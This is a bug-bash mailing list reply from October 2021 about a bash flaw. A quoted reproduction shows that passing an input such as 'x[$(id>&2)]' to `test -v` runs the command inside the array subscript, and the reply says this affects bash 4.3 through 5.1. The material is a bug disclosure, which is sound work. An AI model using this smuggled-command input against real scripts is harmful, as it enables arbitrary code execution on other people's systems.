bug-bash
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Arbitrary command execution from test on a quoted string


From: Greg Wooledge
Subject: Re: Arbitrary command execution from test on a quoted string
Date: Thu, 28 Oct 2021 18:29:28 -0400

On Thu, Oct 28, 2021 at 08:33:22PM +0000, elettrino via Bug reports for the GNU 
Bourne Again SHell wrote:
> 
> user@machine:~$ USER_INPUT='x[$(id>&2)]'
> user@machine:~$ test -v "$USER_INPUT"
> uid=1519(user) gid=1519(user) groups=1519(user),100(users)
> user@machine:~$

Whoo.  This uses a feature that was introduced in bash 4.2.  It doesn't
cause code injection in bash 4.2, though.  It *does* cause code injection
in bash 4.3 through 5.1.

Adding it to my wiki page.



reply via email to

[Prev in Thread] Current Thread [Next in Thread]